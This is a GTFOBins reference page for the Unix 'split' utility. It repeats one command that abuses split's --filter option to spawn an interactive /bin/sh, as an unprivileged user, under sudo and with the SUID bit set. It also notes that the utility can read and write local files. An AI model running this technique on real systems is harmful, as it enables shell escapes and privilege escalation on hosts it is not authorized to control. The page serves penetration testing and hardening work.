

split | GTFOBins

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This executable can spawn an interactive system shell.

- Unprivileged

This function can be performed by any unprivileged user.

```
split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts
```

Sudo

This function is performed by the privileged user if executed via `sudo` because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via `sudo VAR=value ...` or exported then `sudo -E ...`.

```
split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts
```

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the *effective* privileges are not dropped.

Remarks

This executable runs commands using the system shell, e.g., via functions like `system`, so it only works for distributions where the shell does not drop SUID privileges.

```
split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts
```

This executable can write data to local files.

This executable can read data from local files.

Source: <https://gtfobins.github.io/gtfobins/split/>